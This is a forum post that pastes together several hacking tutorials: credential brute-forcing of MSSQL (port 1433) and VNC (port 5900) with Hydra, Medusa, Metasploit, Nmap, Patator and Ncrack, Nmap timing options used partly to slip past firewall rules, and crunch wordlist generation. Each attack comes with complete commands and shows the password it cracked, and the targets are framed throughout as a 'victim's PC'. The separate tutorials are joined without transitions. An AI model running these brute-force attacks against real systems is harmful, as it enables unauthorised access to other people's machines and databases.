Login

**NINZA** · 05-14-2020, 08:27 AM

0			0

In this article, we will learn how to gain control over our victim’s PC through 1433 Port use for MSSQL service. There are various ways to do it and let take time and learn all those because different circumstances call for a different measure.
Let’s start!!
Hydra
Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, vnc, http, https, smb, several databases, and much more
Now, we need to choose a word list. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.
Run the following command
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.128 mssql
1
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.128 mssql
Here,
-P: denotes path for the password list
-L: denotes path of the username text file (sa is default user of Mssql)
Once the commands are executed it will start applying the dictionary attack and so you will have the right password in no time. As you can observe that we had successfully grabbed the MSSQL password as apple@123456
[Image: 1.png?w=687&ssl=1]

Medusa
Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, MSSQL, HTTP, IMAP, rlogin, SSH, Subversion, and MSSQL to name a few
Run the following command
medusa -h 192.168.1.128 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql
1
medusa -h 192.168.1.128 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql
Here,
-u: denotes username (sa is default user of Mssql)
-P: denotes path for the password list
As you can observe that we had successfully grabbed the MSSQL password as apple@123456.
[Image: 2.png?w=687&ssl=1]

xHydra
This is the graphical version to apply dictionary attack via 1433 port to hack a system. For this method to work:
Enter xHydra in your Kali Linux terminal. And select Single Target option and their give the IP of your victim PC. And select MSSQL in the box against Protocol option and give the port number 1433 against the port option.
[Image: 3.png?w=687&ssl=1]

Now, go to Passwords tab and select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.
[Image: 4.png?w=687&ssl=1]

After doing this, go to the Start tab and click on the Start button on the left.
Now, the process of dictionary attack will start. Thus, you will attain the username Confused

a and password of your victim.
[Image: 5.png?w=687&ssl=1]

Metasploit
This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).
use auxiliary/scanner/mssql/mssql_login
msf auxiliary(scanner/mssql/mssql_login) > set rhosts 192.168.1.128
msf auxiliary(scanner/mssql/mssql_login) > set user_file /root/Desktop/user.txt
msf auxiliary(scanner/mssql/mssql_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(scanner/mssql/mssql_login) > set stop_on_success true
msf auxiliary(scanner/mssql/mssql_login) > run
1
2
3
4
5
6
use auxiliary/scanner/mssql/mssql_login
msf auxiliary(scanner/mssql/mssql_login) > set rhosts 192.168.1.128
msf auxiliary(scanner/mssql/mssql_login) > set user_file /root/Desktop/user.txt
msf auxiliary(scanner/mssql/mssql_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(scanner/mssql/mssql_login) > set stop_on_success true
msf auxiliary(scanner/mssql/mssql_login) > run
Awesome!! From given below image you can observe the same password: apple@123456 have been found by Metasploit.
[Image: 6.png?w=687&ssl=1]

Nmap
Given below command will attempt to determine username and password through brute force attack against MS-SQL by means of username and password dictionary.
nmap -p 1433 –script ms-sql-brute –script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.128
1
nmap -p 1433 –script ms-sql-brute –script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.128
In the specified image, you can observe that we had successfully retrieve credential for usersUsername: sa and password: apple@123456
[Image: 7.png?w=687&ssl=1]

Hello everyone, in this article we will have a look at the different parameters that are used together to make a timing template and how to use those parameters individually according to will.
Let’s Start!!
Nmap Timing Template
As we have seen that Nmap has multiple timing templates that can be used differently as according to the requirement. Click

[To see content please register here]

to check the timing scan article. Let’s see what’s inside the timing template. to get the description of timing template we’ll use -d attribute.
nmap -T4 –d -p21-25 192.168.1.139
1
nmap -T4 –d -p21-25 192.168.1.139
Here we have multiple arguments that collectively make a timing template. Let’s have a look at them one by one.

Host-groups
Rtt-timeouts
Scan-delay
Max-retires
Min-rates
Parallelism

Maximum Retries (–max-retries)
–max-retries specifies the number of times a packet is to be resent on a port to check if it is open or closed. If –max-retries is set to 0, the packets will be sent only once on a port and no retries will be done.
nmap -p21-25 192.168.1.139 --max-retries 0
1
nmap -p21-25 192.168.1.139 --max-retries 0
[Image: 2.png?w=687&ssl=1]

Here in Wireshark, we can see that 1-1 TCP SYN packet sent to each port from source: 192.168.1.126 to destination: 192.168.1.139 are not sent again.
[Image: 3.png?w=687&ssl=1]

Now we will apply a small firewall rule on the target machine so that the packets get blocked if they come at a faster rate.
sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --set
sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --update --seconds 1 --hitcount 1 -j DROP
1
2
sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --set
sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --update --seconds 1 --hitcount 1 -j DROP
[Image: 4.png?w=687&ssl=1]

Now, the normal scan will not show any results with max-retries
nmap -p21-25 192.168.1.139 --max-retries 0
1
nmap -p21-25 192.168.1.139 --max-retries 0
[Image: 5.png?w=687&ssl=1]

As we can see that the ports whose packets got dropped are not sent again so their status is not determined.
[Image: 6.png?w=687&ssl=1]

here we can increase the max-retries value which will bypass the specified firewall filter so that we can get the exact port status.
nmap -p21-25 192.168.1.139 --max-retries 5
1
nmap -p21-25 192.168.1.139 --max-retries 5
[Image: 7.png?w=687&ssl=1]

Here we can see that TCP SYN packets sent to one port from source: 192.168.1.126 to destination: 192.168.1.139 are sent again and again until the packets return a specified reply or the maximum retry value (here 5) is reached.
[Image: 8.png?w=687&ssl=1]

Host-timeout
The –host-timeout is an attribute that specifies the scan to give up on a host after the specified time. The lesser the time specified the more are the chances of inaccuracy in scan results.
We can specify the time in milliseconds (ms), seconds (s), minutes (m)
nmap -p21-25 192.168.1.139 --host-timeout 10ms
1
nmap -p21-25 192.168.1.139 --host-timeout 10ms
[Image: 9.png?w=687&ssl=1]

Now we will try to get the result by increasing the timeout value
nmap -p21-25 192.168.1.139 --host-timeout 100ms
1
nmap -p21-25 192.168.1.139 --host-timeout 100ms
[Image: 10.png?w=687&ssl=1]

We can use –host-timeout in other scenarios also like when we need to check if the host system is live or not. Here we have shown how the host-timeout can affect the results of a ping scan.
nmap -sP 192.168.1.139 --host-timeout 10ms
1
nmap -sP 192.168.1.139 --host-timeout 10ms
The output from the above command had given 0 hosts is up.
nmap -sP 192.168.1.139 --host-timeout 100ms
1
nmap -sP 192.168.1.139 --host-timeout 100ms
The output from the above command had given 1 host is up.
[Image: 11.png?w=687&ssl=1]

Hostgroup
hostgroup attribute is specified to scan a specified number of hosts in the network at a time. You need to specify the minimum number of hosts or maximum number of hosts or both to be scanned at a time
nmap -sP 192.168.1.1/24 --min-hostgroup 3 --max-hostgroup 3
1
nmap -sP 192.168.1.1/24 --min-hostgroup 3 --max-hostgroup 3
From given below image you can be observed that it has shown only 3 live hosts from inside complete subnet mask and save your time from scanning the complete network.
[Image: 12.png?w=687&ssl=1]

Scan delay
Scan delay is used to delay the packet to be sent by the specified time. It is very useful in evading time-based firewalls.
nmap -p21-25 192.168.1.139 --scan-delay 11s
1
nmap -p21-25 192.168.1.139 --scan-delay 11s
[Image: 13.png?w=687&ssl=1]

here we can see the time difference in between the packets
packet 1: TCP SYN packet on port 25 at 07:58:01 from 192.168.1.126 to 192.168.1.139
[Image: 14.png?w=687&ssl=1]

packet 2: TCP SYN packet on port 22 at 07:58:12 from 192.168.1.126 to 192.168.1.139
Now if you will count the time difference between these packets you get 11 sec time laps between these two packets.
[Image: 15.png?w=687&ssl=1]

Maximum rate (max-rate)
Rate is an attribute that specifies at what rate is the packets are to be sent, in other words, number of packets to be sent at a time. Max-rate specifies the maximum number of packets to be sent at once.
nmap -p21-25 192.168.1.139 --max-rate 2
1
nmap -p21-25 192.168.1.139 --max-rate 2
[Image: 16.png?w=687&ssl=1]

wireshark shows that the packets sending rate are less than 2, means the number of packets sent at a time is less than or equal to 2
packet 1: TCP SYN packet on port 21 at 03:17:20 from 192.168.1.126 to 192.168.1.139
[Image: 17.png?w=687&ssl=1]

packet 2: TCP SYN packet on port 23 at 03:17:21 from 192.168.1.126 to 192.168.1.139
Now if you will count the time difference between these packets you get 1 sec time laps between these two packets indicating that these two packets were not sent together.
[Image: 18.png?w=687&ssl=1]

Minimum rate (min-rate)
Min-rate specifies the maximum number of packets to be sent at once. Here if we want at least 2 packets must be sent on target’s network at the same time not less than this, then need to execute below command.
nmap -p21-25 192.168.1.139 --min-rate 2
1
nmap -p21-25 192.168.1.139 --min-rate 2
[Image: 19.png?w=687&ssl=1]

wireshark shows that the packets sending rate are greater than 2, means the number of packets sent at a time is equal to or greater than 2
packet 1: TCP SYN packet on port 23 at 03:28:29 from 192.168.1.126 to 192.168.1.139
[Image: 20.png?w=687&ssl=1]

packet 2: TCP SYN packet on port 22 at 03:28:29 from 192.168.1.126 to 192.168.1.139
Now if you will count the time difference between these packets you get only a fraction of second as time laps between these two packets indicating that these two packets were sent together.
[Image: 21.png?w=687&ssl=1]

Parallelism
Parallelism attribute is used to send multiple packets in parallel, min-parallelism means that the number of packets to be sent in parallel is to be greater than the value specified and max-parallelism means that the number of packets to be sent in parallel is to be less than or equal to the value specified
nmap -p21-25 192.168.1.139 --min-parallelism 2 --max-parallelism 2
1
nmap -p21-25 192.168.1.139 --min-parallelism 2 --max-parallelism 2
[Image: 22.png?w=687&ssl=1]

In Wireshark we can see a couple of TCP-SYN packets sent in parallel from 192.168.1.126 which is neither less nor greater than 2.
[Image: 23.png?w=687&ssl=1]

Round trip timeout
Rtt timeout is the time specified for a packet to return a reply, min-rtt-timeout specifies the minimum value of time that is to be taken by a packet to return a reply
nmap -p21-25 192.168.1.139 --min-rtt-timeout 5ms
1
nmap -p21-25 192.168.1.139 --min-rtt-timeout 5ms
[Image: 24.png?w=687&ssl=1]

wireshark shows that the packet and its reply takes time greater than the min-rtt-timeout specified
[Image: 25.png?w=687&ssl=1]

packet 1: TCP SYN packet on port 25 at 08:10:53.232666116 from 192.168.1.126 to 192.168.1.139
packet 2: SYN-ACK packet from port 25 at 08:10:53.233466679 from 192.168.1.139 to 192.168.1.126
[Image: 26.png?w=687&ssl=1]

Max-rtt-timeout
max-rtt-timeout specifies the maximum value of time that is to be taken by a packet to return a reply
nmap -p21-25 192.168.1.139 --max-rtt-timeout 50ms
1
nmap -p21-25 192.168.1.139 --max-rtt-timeout 50ms
[Image: 27.png?w=687&ssl=1]

wireshark shows that the packet and its reply takes time lesser than the max-rtt-timeout
packet 1: TCP SYN packet on port 22 at 08:15:08.171777907 from 192.168.1.126 to 192.168.1.139
[Image: 28.png?w=687&ssl=1]

packet 2: SYN-ACK packet from port 22 at 08:15:08.173117154 from 192.168.1.139 to 192.168.1.126
[Image: 29.png?w=687&ssl=1]

Initial Round trip timeout
Initial-rtt-timeout specifies the initial value of time to be taken by a packet to return a reply, the return time can be greater or lesser than the initial-rtt-timeout because of the max-rtt-timeout and min-rtt-timeout specifies the range of time for a packet to return a reply but the packet attempts to return a reply in the time specified in initial-rtt-timeout
nmap -p21-25 192.168.1.139 --initial-rtt-timeout 50ms
1
nmap -p21-25 192.168.1.139 --initial-rtt-timeout 50ms
[Image: 30.png?w=687&ssl=1]

Wireshark shows that the time taken by the packet to return reply is around the same time as specified in initial-rtt-timeout
packet 1: TCP SYN packet on port 23 at 08:18:45.342395520 from 192.168.1.126 to 192.168.1.139
[Image: 31.png?w=687&ssl=1]

packet 2: SYN-ACK packet from port 23 at 08:18:45.342930962 from 192.168.1.139 to 192.168.1.126
[Image: 32.png?w=687&ssl=1]

Hello friends!! Today we will demonstrate how a pentester can generate his own wordlist for username either password using the most powerful tool CRUNCH. In Kali Linux you can easily get crunch by exploring Application > Password Attacks > Crunch
Crunch can generate a wordlist subject to the conditions you specify and its output file can be used in any other another program or file.
[Image: 1.png?w=687&ssl=1]

We are using crunch version 3.6 for this tutorial and followed given below parameters for generating a wordlist.
Syntax: <min> <max> [character-string] [options]
Min-len: This parameter specify minimum length string required for crunch to start generating wordlist.
Max-len: This parameter specifies maximum length string required for crunch to end.
Charset string: This parameter specifies character sets for crunch to use for generating wordlist from that string, if you have not specified any string then crunch will default characters string.
Options: crunch serves you a list of options which increase its functionality for generating wordlist as per your requirement.
[Image: 2.0.png?w=687&ssl=1]

Generating wordlist without using the character string
Execute given below command which will generate a dictionary that contains minimum 2 character letters and maximum 3 by using default character sets. It will start from aa and end with zzz.
crunch 2 3 -o /root/Desktop/0.txt
1
crunch 2 3 -o /root/Desktop/0.txt
Here we had used the following parameters for generating a dictionary:
Min_len: 2 for two character letters
Max_len: 3 for three character letters
-o: This option denotes the path to save the output in a text file.
From given below image you can observe that it has generated 18252 number of lines and saved in the 0.txt file.
[Image: 2.1.png?w=687&ssl=1]

Now here we had used cat command to read the content from the inside 0.txt file where we can perceive that it has started from aa and end with zzz as shown in given below image.
cat /root/Desktop/0.txt
1
cat /root/Desktop/0.txt
[Image: 2.2.png?w=687&ssl=1]

Generating wordlist using the character string
Now execute given below command which will generate a dictionary that contains minimum 3 character letters and maximum 4 by using “raj” as the specified string. Similarly, it will start from rrr and end with jjjj.
crunch 3 4 raj -o /root/Desktop/1.txt
1
crunch 3 4 raj -o /root/Desktop/1.txt
From given below image you can observe that it has generated 108 number of lines and saved in the 1.txt file.
[Image: 3.png?w=687&ssl=1]

Now we had used the cat command to read the content from the inside 1.txt file where we can perceive that it has started from rrr and end with jjjj.
cat /root/Desktop/1.txt
1
cat /root/Desktop/1.txt
Similarly, we can use the string of any number for making a dictionary which contains numeric characters.
For example, some users set their date of birth as password and we would like to generate a dictionary that contains a combination of four number such that it represents month and date for instant 25th May as 2505 then you can use “2505” as a character string for generating a numeric wordlist.
[Image: 4.png?w=687&ssl=1]

Generating alpha-numeric wordlist
You can generate your own alpha-numeric wordlist, execute given below command which will generate a dictionary that contains minimum 2 character letters and maximum 3 by using “raj123” as the specified string.
You can set minimum and maximum length for your wordlist as per your requirement.
crunch 2 3 raj123 -o /root/Desktop/3.txt
1
crunch 2 3 raj123 -o /root/Desktop/3.txt
[Image: 7.1.png?w=687&ssl=1]

Again we had used the cat command to read the content from the inside 3.txt file where we can perceive that it has a combination of alpha-numeric character.
cat /root/Desktop/3.txt
1
cat /root/Desktop/3.txt
[Image: 7.2.png?w=687&ssl=1]

Generating wordlist along with space character
The following command will generate wordlist using space character (\) with string “raj”. Instead of using (\) you can also use double quotes around string as “raj ” along with space within double quotes.
crunch 1 3 raj\ /root/Desktop/4.txt
1
crunch 1 3 raj\ /root/Desktop/4.txt
[Image: 7.png?w=687&ssl=1]

Create wordlist using character set file of RainbowCrack
As we have known rainbow crack has a character set file which is used for cracking hashes by using a rainbow table, but we’ll use this character set file for generating a complex wordlist as per situation demands.
cat /usr/share/rainbowcrack/charset.txt
1
cat /usr/share/rainbowcrack/charset.txt
We had used the cat command to express the list of the character set that has been stored in charset.txt of rainbow crack. From given below image you can observe that it is showing the following list of the character set.

Numeric
Alpha
Alpha-numeric
Loweralpha
Loweralpha numeric
Mixalpha
Mixalpha-numeric
Ascii -32-95
Ascii -32-65-123-4
Alpha-numeric-symbol32-space

Now you can choose any character set for generating a wordlist. Let suppose I want to generate a wordlist which contains lower alphabets letter along with a numeric number for 5 letter words so for that I will execute the following command.
crunch 4 5 -f /usr/share/rainbowcrack/charset.txt loweralpha-numeric -o /root/Desktop/5.txt
1
crunch 4 5 -f /usr/share/rainbowcrack/charset.txt loweralpha-numeric -o /root/Desktop/5.txt
Here –f denotes Specifies a character set from the charset.lst
[Image: 9.png?w=687&ssl=1]

Again we had used the cat command to read the content from the inside 5.txt file where we can perceive that it has a combination of alpha-numeric character.
cat /root/Desktop/5.txt
1
cat /root/Desktop/5.txt
[Image: 10.png?w=687&ssl=1]

Generate wordlist with specific Pattern
Crunch provides –t option to generate a wordlist using a specific pattern as per your requirement.
Using option –t you can generate 4 type patters as specified below:

Use @ for lowercase alphabets
Use , for uppercase alphabets
Use % for numeric character
Use ^ for special character symbol

For generating a wordlist that contains 3 numeric characters on the right side of string “raj” for instant raj123, we need to execute the following command.
Since we have 3 letters from string raj and we are assuming 3 more numeric number after the given string, therefore the minimum length should be the sum of string and pattern character.
crunch 6 6 -t raj%%% -o /root/Desktop/6.txt
1
crunch 6 6 -t raj%%% -o /root/Desktop/6.txt
Here –t denotes % pattern is used for editing 3 numeric characters.
[Image: 11.png?w=687&ssl=1]

Again we had used the cat command to read the content from the inside 6.txt file where we can perceive that it has a combination of alpha-numeric character.
cat /root/Desktop/6.txt
1
cat /root/Desktop/6.txt
[Image: 12.png?w=687&ssl=1]

Generate wordlist with Duplicate character limit
Crunch let you bound the repetition of character by using –d parameters along with the given pattern.
As we saw, above the pattern for raj%%% starts with raj000 which means every single number will consecutive either twice or thrice such as it will contain word as raj000, raj001, raj111, raj110 and so on in the wordlist.
If you don’t wish to create a wordlist with the repeated number then you can use –d option to set the filter for repetition.
For example, I want to generate a wordlist by using the above pattern i.e. raj%%% and consecutive repetition of each number almost twice. For implementing such type of dictionary we need to execute below command.
crunch 6 6 -t raj%%% -d 2% -o /root/Desktop/6.1.txt
1
crunch 6 6 -t raj%%% -d 2% -o /root/Desktop/6.1.txt
here we had use following parameter
–t denotes % pattern is used for editing 3 numeric character
-d denote % pattern is used for editing 3 numeric characters with the repetition of each number almost twice.
[Image: 13.1.png?w=687&ssl=1]

Again we had used the cat command to read the content from inside 6.1.txt file where we can perceive that it has a combination of alpha-numeric character with repetition of each number two times.
cat /root/Desktop/6.1.txt
1
cat /root/Desktop/6.1.txt
Now if you will compare output file 6.txt and 6.1.txt then you can notice the difference of number repetition.
[Image: 13.2.png?w=687&ssl=1]

Generate wordlist with Pattern for uppercase letter
For generating a wordlist that contains 3 uppercase characters on the right side of string “raj” for instant rajABC, we need to execute the following command.
Since we have 3 letters from string raj and we are assuming 3 more uppercase letters after the given string, therefore the minimum length should be the sum of string and pattern character.
crunch 6 6 -t raj,,, -o /root/Desktop/7.txt
1
crunch 6 6 -t raj,,, -o /root/Desktop/7.txt
Here –t denotes (,) pattern is used for editing 3 uppercase letter character.
[Image: 13.png?w=687&ssl=1]

Again we had used the cat command to read the content from the inside 7.txt file where we can perceive that it has a combination of mix-alpha character.
cat /root/Desktop/7.txt
1
cat /root/Desktop/7.txt
[Image: 14.png?w=687&ssl=1]

Similarly, we can set the limit for uppercase letter repletion as done above. So if I want that alphabets should not be consecutive then we can execute given below command for generating such type of dictionary.
crunch 6 6 -t raj,,, -d 1, -o /root/Desktop/7.1.txt
1
crunch 6 6 -t raj,,, -d 1, -o /root/Desktop/7.1.txt
–t denotes (,) pattern is used for editing 3 uppercase character
-d denote (,) pattern is used for editing 3 uppercase characters with repetition of each number almost one.
[Image: 15.1.png?w=687&ssl=1]

Again we had used the cat command to read the content from inside 7.1.txt file where we can perceive that it has a combination of mix-alpha character with repetition of each number two times.
cat /root/Desktop/7.1.txt
1
cat /root/Desktop/7.1.txt
Now if you will compare output file 7.txt and 7.1.txt then you can notice the difference of alphabet repetition.
[Image: 15.2.png?w=687&ssl=1]

Use Permutation for generating a wordlist
-p option is used for generating wordlist with help of permutation, here can ignore min and max length of the character string. Moreover, it can be used with one-word string or multiple words string as given below.
crunch 3 6 -p raj chandel hackingarticles
1
crunch 3 6 -p raj chandel hackingarticles
From given below image you can analysis the output result and get the maximum number of permutation generated.
[Image: 15.png?w=687&ssl=1]

Generate a Dictionary with limited words
If you will observe above all output result then you will find crunch has generated dictionary and displays the number of the line for each dictionary. For instance, text file 0.txt has 18252 number of line and each line contains one word only.
So if you wish to set the filter for a certain number of the line should be generated then execute given below line.
crunch 5 5 IGNITE -c 25 -o /root/Desktop/8.txt
1
crunch 5 5 IGNITE -c 25 -o /root/Desktop/8.txt
It will generate a dictionary of 25 words only and save output in 8.txt.
[Image: 16.1.png?w=687&ssl=1]

Again we had used the cat command to read the content from an inside 8.txt file where we can perceive that it has only 25 alpha character.
cat /root/Desktop/8.txt
1
cat /root/Desktop/8.txt
[Image: 16.2.png?w=687&ssl=1]

Wordlist Fragmentation
Use –b option for wordlist fragmentation that split a single wordlist into multi wordlist. It is a quite useful option for dividing wordlist which is in GB can break into MB.
crunch 5 7 raj@123 -b 3mb -o START
1
crunch 5 7 raj@123 -b 3mb -o START
From given below image you can observe that it has divided a 7MB file into three text file.
[Image: 17.png?w=687&ssl=1]

Generate compressed Dictionary
Crunch let you generate compress wordlist with option –z and other parameters are gzip, bzip2, lzma, and 7z, execute given below command for compression.
crunch 5 7 raj@123 –z gzip -o START
1
crunch 5 7 raj@123 –z gzip -o START
From given below image you can observe that it has generated the compress text file.
[Image: 18.png?w=687&ssl=1]

In this article, we will learn how to gain control over our victim’s PC through 5900 Port use for VNC service. There are various ways to do it and let take time and learn all those because different circumstances call for a different measure.
Table of Contents

Hydra
X-Hydra
Medusa
Ncrack
Patator
Metasploit

Let’s starts!!
xHydra
This is the graphical version to apply dictionary attack via 5900 port to hack a system. For this method to work:
Enter xHydra in your Kali Linux terminal. And select Single Target option and there give the IP of your victim PC. And select VNC in the box against Protocol option and give the port number 5900 against the port option.
[Image: 1.png?w=687&ssl=1]

Now, go to Passwords tab and select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.
[Image: 2.png?w=687&ssl=1]

After doing this, go to the Start tab and click on the Start button on the left.
Now, the process of dictionary attack will start. Thus, you will obtain the username and password of your victim.
[Image: 3.png?w=687&ssl=1]

Hydra
Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, vnc, http, https, smb, several databases, and much more
Now, we need to choose a word list. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.
Run the following command
hydra -s 5900 –P /root/Desktop/pass.txt –t 16 192.168.0.6 vnc
1
hydra -s 5900 –P /root/Desktop/pass.txt –t 16 192.168.0.6 vnc
-P: denotes the path for the password list
-s: denote destination port number
-t: Run TASKS number of connects in parallel
Once the commands are executed it will start applying the dictionary attack and so you will have the right password in no time. As you can observe that we had successfully grabbed the VNC password as 098765
[Image: 4.png?w=687&ssl=1]

Metasploit
This module will test a VNC server on a range of machines and report successful logins. Currently, it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge-response authentication method.
use auxiliary/scanner/vnc/vnc_login
msf auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.0.6
msf auxiliary(scanner/vnc/vnc_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(scanner/vnc/vnc_login) > run
1
2
3
4
use auxiliary/scanner/vnc/vnc_login
msf auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.0.6
msf auxiliary(scanner/vnc/vnc_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(scanner/vnc/vnc_login) > run
Awesome!! From given below image you can observe the same password: 098765 have been found by Metasploit.
[Image: 5.png?w=687&ssl=1]

Patator
Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. It is quite useful for making brute force attack on several ports such as VNC, HTTP, SMB and etc.
patator vnc_login host=192.168.0.6 password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0
1
patator vnc_login host=192.168.0.6 password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0
[Image: 6.png?w=687&ssl=1]

From given below image you can observe that the process of dictionary attack starts and thus, you will obtain the password of your victim.
[Image: 7.1.png?w=687&ssl=1]

Medusa
Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, VNC, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few
Run the following command
medusa -h 192.168.0.6 –u root -P /root/Desktop/pass.txt –M vnc
1
medusa -h 192.168.0.6 –u root -P /root/Desktop/pass.txt –M vnc
Here
-u: denotes username
-P: denotes the path for the password list
As you can observe that we had successfully grabbed the VNC password like 098765.
[Image: 7.png?w=687&ssl=1]

Ncrack
Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.
Run the following command
ncrack -V --user root -P /root/Desktop/pass.txt 192.168.0.6:5900
1
ncrack -V --user root -P /root/Desktop/pass.txt 192.168.0.6:5900
Here
-U: denotes the path for username list
-P: denotes the path for the password list
As you can observe that we had successfully grabbed the vnc password like 098765.
[Image: 8.png?w=687&ssl=1]

Login
Username: Password: Lost Password? Remember me
Or Register an account

Announcement : For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis

Announcement :

For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis